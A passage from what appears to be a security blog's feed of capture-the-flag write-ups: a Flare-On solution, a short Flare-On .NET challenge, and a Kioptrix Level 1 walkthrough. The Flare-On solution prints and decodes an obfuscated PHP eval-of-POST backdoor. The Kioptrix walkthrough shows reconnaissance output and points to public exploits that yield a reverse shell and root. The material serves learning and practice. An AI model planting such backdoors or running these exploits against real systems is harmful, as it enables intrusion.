class="mi">38</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">70</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">79</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">88</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">59</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">73</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">63</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">45</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">77</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">43</span><span class="p">,</span> <span class="mi">52</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">77</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">59</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">73</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">77</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">70</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">70</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">70</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">70</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">93</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">82</span><span class="p">,</span> <span class="mi">59</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">82</span><span class="p">,</span> <span class="mi">59</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">47</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">do_me</span><span class="o">=</span><span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">order</span><span class="p">)):</span> </span></span><span class="line"><span class="cl"> <span class="n">do_me</span><span class="o">+=</span><span class="n">terms</span><span class="p">[</span><span class="n">order</span><span class="p">[</span><span class="n">i</span><span class="p">]]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nb">print</span> <span class="p">(</span><span class="n">do_me</span><span class="p">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>This generated payload looks to contain a few base64 encoded strings.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="err">$</span><span class="n">_</span><span class="o">=</span> <span class="s1">&#39;aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9&#39;</span><span class="p">;</span><span class="err">$</span><span class="n">__</span><span class="o">=</span><span class="s1">&#39;JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7&#39;</span><span class="p">;</span><span class="err">$</span><span class="n">___</span><span class="o">=</span><span class="s2">&#34;</span><span class="se">\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65</span><span class="s2">&#34;</span><span class="p">;</span><span class="nb">eval</span><span class="p">(</span><span class="err">$</span><span class="n">___</span><span class="p">(</span><span class="err">$</span><span class="n">__</span><span class="p">));</span> </span></span></code></pre></td></tr></table> </div> </div><p>I created the following code to decode the strings</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">base64</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s1">&#39;$_ is&#39;</span><span class="p">,</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="s1">&#39;aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s1">&#39;$__ is&#39;</span><span class="p">,</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="s1">&#39;JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7&#39;</span><span class="p">))</span> </span></span></code></pre></td></tr></table> </div> </div><p>This code extracts some POST payloads that look to be hex and decimal ASCII codes.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="err">$</span><span class="n">_</span> <span class="ow">is</span> <span class="sa">b</span><span class="s1">&#39;if(isset($_POST[&#34;</span><span class="se">\\</span><span class="s1">97</span><span class="se">\\</span><span class="s1">49</span><span class="se">\\</span><span class="s1">49</span><span class="se">\\</span><span class="s1">68</span><span class="se">\\</span><span class="s1">x4F</span><span class="se">\\</span><span class="s1">84</span><span class="se">\\</span><span class="s1">116</span><span class="se">\\</span><span class="s1">x68</span><span class="se">\\</span><span class="s1">97</span><span class="se">\\</span><span class="s1">x74</span><span class="se">\\</span><span class="s1">x44</span><span class="se">\\</span><span class="s1">x4F</span><span class="se">\\</span><span class="s1">x54</span><span class="se">\\</span><span class="s1">x6A</span><span class="se">\\</span><span class="s1">97</span><span class="se">\\</span><span class="s1">x76</span><span class="se">\\</span><span class="s1">x61</span><span class="se">\\</span><span class="s1">x35</span><span class="se">\\</span><span class="s1">x63</span><span class="se">\\</span><span class="s1">x72</span><span class="se">\\</span><span class="s1">97</span><span class="se">\\</span><span class="s1">x70</span><span class="se">\\</span><span class="s1">x41</span><span class="se">\\</span><span class="s1">84</span><span class="se">\\</span><span class="s1">x66</span><span class="se">\\</span><span class="s1">x6C</span><span class="se">\\</span><span class="s1">97</span><span class="se">\\</span><span class="s1">x72</span><span class="se">\\</span><span class="s1">x65</span><span class="se">\\</span><span class="s1">x44</span><span class="se">\\</span><span class="s1">65</span><span class="se">\\</span><span class="s1">x53</span><span class="se">\\</span><span class="s1">72</span><span class="se">\\</span><span class="s1">111</span><span class="se">\\</span><span class="s1">110</span><span class="se">\\</span><span class="s1">68</span><span class="se">\\</span><span class="s1">79</span><span class="se">\\</span><span class="s1">84</span><span class="se">\\</span><span class="s1">99</span><span class="se">\\</span><span class="s1">x6F</span><span class="se">\\</span><span class="s1">x6D&#34;])) { eval(base64_decode($_POST[&#34;</span><span class="se">\\</span><span class="s1">97</span><span class="se">\\</span><span class="s1">49</span><span class="se">\\</span><span class="s1">x31</span><span class="se">\\</span><span class="s1">68</span><span class="se">\\</span><span class="s1">x4F</span><span class="se">\\</span><span class="s1">x54</span><span class="se">\\</span><span class="s1">116</span><span class="se">\\</span><span class="s1">104</span><span class="se">\\</span><span class="s1">x61</span><span class="se">\\</span><span class="s1">116</span><span class="se">\\</span><span class="s1">x44</span><span class="se">\\</span><span class="s1">79</span><span class="se">\\</span><span class="s1">x54</span><span class="se">\\</span><span class="s1">106</span><span class="se">\\</span><span class="s1">97</span><span class="se">\\</span><span class="s1">118</span><span class="se">\\</span><span class="s1">97</span><span class="se">\\</span><span class="s1">53</span><span class="se">\\</span><span class="s1">x63</span><span class="se">\\</span><span class="s1">114</span><span class="se">\\</span><span class="s1">x61</span><span class="se">\\</span><span class="s1">x70</span><span class="se">\\</span><span class="s1">65</span><span class="se">\\</span><span class="s1">84</span><span class="se">\\</span><span class="s1">102</span><span class="se">\\</span><span class="s1">x6C</span><span class="se">\\</span><span class="s1">x61</span><span class="se">\\</span><span class="s1">114</span><span class="se">\\</span><span class="s1">101</span><span class="se">\\</span><span class="s1">x44</span><span class="se">\\</span><span class="s1">65</span><span class="se">\\</span><span class="s1">x53</span><span class="se">\\</span><span class="s1">72</span><span class="se">\\</span><span class="s1">111</span><span class="se">\\</span><span class="s1">x6E</span><span class="se">\\</span><span class="s1">x44</span><span class="se">\\</span><span class="s1">x4F</span><span class="se">\\</span><span class="s1">84</span><span class="se">\\</span><span class="s1">99</span><span class="se">\\</span><span class="s1">x6F</span><span class="se">\\</span><span class="s1">x6D&#34;])); }&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="err">$</span><span class="n">__</span> <span class="ow">is</span> <span class="sa">b</span><span class="s1">&#39;$code=base64_decode($_);eval($code);&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Once more to convert these values to characters we find the flag.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;_POST = &#34;</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s2">&#34;&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">string2</span><span class="o">=</span><span class="p">[</span><span class="mi">97</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mh">0x4F</span><span class="p">,</span> <span class="mi">84</span><span class="p">,</span> <span class="mi">116</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">,</span> <span class="mi">97</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x44</span><span class="p">,</span> <span class="mh">0x4F</span><span class="p">,</span> <span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x6A</span><span class="p">,</span> <span class="mi">97</span><span class="p">,</span> <span class="mh">0x76</span><span class="p">,</span> <span class="mh">0x61</span><span class="p">,</span> <span class="mh">0x35</span><span class="p">,</span> <span class="mh">0x63</span><span class="p">,</span> <span class="mh">0x72</span><span class="p">,</span> <span class="mi">97</span><span class="p">,</span> <span class="mh">0x70</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">,</span> <span class="mi">84</span><span class="p">,</span> <span class="mh">0x66</span><span class="p">,</span> <span class="mh">0x6C</span><span class="p">,</span> <span class="mi">97</span><span class="p">,</span> <span class="mh">0x72</span><span class="p">,</span> <span class="mh">0x65</span><span class="p">,</span> <span class="mh">0x44</span><span class="p">,</span> <span class="mi">65</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mi">72</span><span class="p">,</span> <span class="mi">111</span><span class="p">,</span> <span class="mi">110</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">79</span><span class="p">,</span> <span class="mi">84</span><span class="p">,</span> <span class="mi">99</span><span class="p">,</span> <span class="mh">0x6F</span><span class="p">,</span> <span class="mh">0x6D</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">string2</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="n">end</span><span class="o">=</span><span class="s2">&#34;&#34;</span><span class="p">)</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">_POST</span> <span class="o">=</span> <span class="n">a11DOTthatDOTjava5crapATflareDASHonDOTcom</span> </span></span></code></pre></td></tr></table> </div> </div> suidroot featured image ctf flare-on python reverse engineering Reverse Engineering https://ben.the-collective.net/posts/2021-01-18-flare-on-1-challenge-1/ Mon, 18 Jan 2021 09:00:00 -0500 locutus@the-collective.net (Ben Mason) Mon, 18 Jan 2021 09:00:00 -0500 https://ben.the-collective.net/posts/2021-01-18-flare-on-1-challenge-1/ This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here In the very first challenge you are presented with a windows executable and when you run it you are presented with a Bob Ross painting a nice scene. But, when you click DECODE! You get a Bob Doge with an weird text string. Digging a little deeper to see what type of file we have we find we hace a . <p>This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found <a href="https://ben.the-collective.net/project-flareon/">here</a></p> <p>In the very first challenge you are presented with a windows executable and when you run it you are presented with a Bob Ross painting a nice scene.</p> <p><img src="../2021-01-18-flare-on-1-challenge-1-images/Screen-Shot-2021-01-15-at-00.24.43.png" alt="" /><br /> But, when you click DECODE! You get a Bob Doge with an weird text string.</p> <p><img src="../2021-01-18-flare-on-1-challenge-1-images/Screen-Shot-2021-01-15-at-00.24.49.png" alt="" /><br /> Digging a little deeper to see what type of file we have we find we hace a .NET executable.</p> <pre tabindex="0"><code>$ file Challenge1.exe Challenge1.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows </code></pre><p>I next loaded the file up in dnSpy and after navigating from the entry point into Form1. I found the following code block.</p> <p><img src="../2021-01-18-flare-on-1-challenge-1-images/80a9ebe1dec6470b85b7064fb1b21c3a.png" alt="" /><br /> The function “<em>btnDecode_Click()</em>” looks very interesting, when stepping into it I find what looks to be a decoding algorithm that pulls its content from the Resources. I set a few breakpoints on the code just after the loops.</p> <p>After running to the breakpoint after the first loop the flag is in clear text in the “<em>text”</em> variable. The next few loops re-encode the flag to return an obscured output shown in the UI.</p> <p><img src="../2021-01-18-flare-on-1-challenge-1-images/258b0c4f203943ca9cc645f0a7ab27d5.png" alt="" /></p> suidroot featured image ctf flare-on reverse engineering Reverse Engineering https://ben.the-collective.net/posts/2020-02-26-ctf-box-kioptrix-level-1-walk-through/ Wed, 26 Feb 2020 09:00:00 -0500 locutus@the-collective.net (Ben Mason) Wed, 26 Feb 2020 09:00:00 -0500 https://ben.the-collective.net/posts/2020-02-26-ctf-box-kioptrix-level-1-walk-through/ This is a walk-through of the first level of the CTF box series named Kioptrix. The virtual machines images can be downloaded from: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ There are two methods I used to exploit this machine, but first, let’s enumerate the server. Enumeration To start, I ran a Nmap scan on the server to see what services are running on it. # Nmap 7.70 scan initiated Sat Apr 13 14:05:06 2019 as: nmap -O -A -sV -sC -oA nmap/knoptrix1 192. <p>This is a walk-through of the first level of the CTF box series named Kioptrix. The virtual machines images can be downloaded from:</p> <p><a href="https://www.vulnhub.com/entry/kioptrix-level-1-1,22/">https://www.vulnhub.com/entry/kioptrix-level-1-1,22/</a></p> <p>There are two methods I used to exploit this machine, but first, let’s enumerate the server.</p> <h2 id="enumeration">Enumeration</h2> <p>To start, I ran a Nmap scan on the server to see what services are running on it.</p> <pre tabindex="0"><code> # Nmap 7.70 scan initiated Sat Apr 13 14:05:06 2019 as: nmap -O -A -sV -sC -oA nmap/knoptrix1 192.168.56.5 Nmap scan report for 192.168.56.5 Host is up (0.00040s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99) | ssh-hostkey: | 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1) | 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA) |_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-title: Test Page for the Apache Web Server on Red Hat Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 1024/tcp status |_ 100024 1 1024/udp status 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-title: 400 Bad Request |_ssl-date: 2019-04-13T22:05:23+00:00; +3h59m59s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 |_ SSL2_RC4_128_WITH_MD5 1024/tcp open status 1 (RPC #100024) MAC Address: 08:00:27:1E:E3:F7 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4 OS details: Linux 2.4.9 - 2.4.18 (likely embedded) Network Distance: 1 hop Host script results: |_clock-skew: mean: 3h59m58s, deviation: 0s, median: 3h59m58s |_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE HOP RTT ADDRESS 1 0.40 ms 192.168.56.5 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Apr 13 14:09:34 2019 -- 1 IP address (1 host up) scanned in 267.98 seconds </code></pre><p>In the output above you will see there are two interesting services Apache HTTPD 1.3.20 with mod_ssl/2.8.4 OpenSSL/0.9.6b and Samba. The version of HTTPD version is quite old and will be of interest. Next, I’ll take a look at Samba using enum4linux.</p> <pre tabindex="0"><code>Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Apr 13 14:11:01 2019 ========================== | Target Information | ========================== Target ........... 192.168.56.5 RID Range ........ 500-550,1000-1050 Username ......... &#39;&#39; Password ......... &#39;&#39; Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 192.168.56.5 | ==================================================== [+] Got domain/workgroup name: MYGROUP ============================================ | Nbtstat Information for 192.168.56.5 | ============================================ Looking up status of 192.168.56.5 KIOPTRIX &lt;00&gt; - B &lt;ACTIVE&gt; Workstation Service KIOPTRIX &lt;03&gt; - B &lt;ACTIVE&gt; Messenger Service KIOPTRIX &lt;20&gt; - B &lt;ACTIVE&gt; File Server Service ..__MSBROWSE__. &lt;01&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Master Browser MYGROUP &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Domain/Workgroup Name MYGROUP &lt;1d&gt; - B &lt;ACTIVE&gt; Master Browser MYGROUP &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Browser Service Elections MAC Address = 00-00-00-00-00-00 ===================================== | Session Check on 192.168.56.5 | ===================================== [+] Server 192.168.56.5 allows sessions using username &#39;&#39;, password &#39;&#39; =========================================== | Getting domain SID for 192.168.56.5 | =========================================== Domain Name: MYGROUP Domain Sid: (NULL SID) [+] Can&#39;t determine if host is part of domain or part of a workgroup ====================================== | OS information on 192.168.56.5 | ====================================== [+] Got OS info for 192.168.56.5 from smbclient: [+] Got OS info for 192.168.56.5 from srvinfo: KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server platform_id : 500 os version : 4.5 server type : 0x9a03 ============================= | Users on 192.168.56.5 | ============================= ========================================= | Share Enumeration on 192.168.56.5 | ========================================= Sharename Type Comment --------- ---- ------- IPC$ IPC IPC Service (Samba Server) ADMIN$ IPC IPC Service (Samba Server) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- KIOPTRIX Samba Server Workgroup Master --------- ------- MYGROUP KIOPTRIX [+] Attempting to map shares on 192.168.56.5 //192.168.56.5/IPC$ [E] Can&#39;t understand response: NT_STATUS_NETWORK_ACCESS_DENIED listing \* //192.168.56.5/ADMIN$ [E] Can&#39;t understand response: tree connect failed: NT_STATUS_WRONG_PASSWORD &lt;...SNIP...&gt; enum4linux complete on Sat Apr 13 14:11:09 2019 </code></pre><p>There is a lot of useful information in this output; however this a bug in the version of enum4linux that does not show the version of Samba running on the server. This missing information becomes important in the second method for getting into the server. Now let us take a look at the first method I used to get on to the server.</p> <h2 id="method-1">Method 1</h2> <p>The first method of getting a shell on the server exploits the mod_ssl module in Apache HTTPd. I found in the enumeration phase that the server is running Apache HTTPD 1.3.20 with mod_ssl/2.8.4 OpenSSL/0.9.6b. After a quick search in Exploit-DB, I found that there are two versions of an exploit for <a href="https://nvd.nist.gov/vuln/detail/CVE-2002-0082">CVE-2002-0082</a> named OpenFuck and OpenFuck2. First I used OpenFuck found at <a href="https://www.exploit-db.com/exploits/21671">https://www.exploit-db.com/exploits/21671</a></p> <p>This exploit ran without issue and gave an unprivileged shell as the user apache using, the output of the exploit is below.</p> <p><img src="../2020-02-26-ctf-box-kioptrix-level-1-walk-through-images/kioptrix1-1.png" alt="" /><br /> After running the exploit and getting on the server, I found the reverse shell died regularly. Once I changed the shell syntax to add “nohup” to background the reverse shell process making the shell not die regularly.</p> <p>There is a better version of this exploit named OpenFuckv2. This version chains a kernel exploit to get root and can be found at <a href="https://www.exploit-db.com/exploits/764">https://www.exploit-db.com/exploits/764</a>. There are issues building this version of the exploit on Linux distributions that have newer versions of libssl. The following link has instructions on how to modify the code from exploit-db to work on more modern distributions.</p> <p><a href="https://www.hypn.za.net/blog/2017/08/27/compiling-exploit-764-c-in-2017/">https://www.hypn.za.net/blog/2017/08/27/compiling-exploit-764-c-in-2017/</a></p> <p>Now that we have exploited the mod_ssl service to get unprivileged access on the server we can move onto the next method to get into and finally get root on this box.</p> <h2 id="method-2">Method 2</h2> <p>After getting an unprivileged shell on the server using Method 1 I started enumerating the server and found that this is a Red Hat Linux release 7.2 (Enigma) server running Samba 2.2.1a. This version of Samba service has the RCE vulnerability, <a href="https://nvd.nist.gov/vuln/detail/CVE-2003-0201">CVE-2003-0201 – Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions.</a></p> <p>This CVE has a published exploit in exploit-db at <a href="https://www.exploit-db.com/exploits/10">https://www.exploit-db.com/exploits/10</a>. The output when running the exploit in brute force mode is shown below,</p> <p><img src="../2020-02-26-ctf-box-kioptrix-level-1-walk-through-images/kioptrix1-2.png" alt="" /><br /> Since this service is running as root, boom, we have a root shell!</p> <p>Overall, This was a pretty straightforward box and would have been easier if I had found the version of Samba earlier.</p> Ben Mason featured image ctf vulnhub 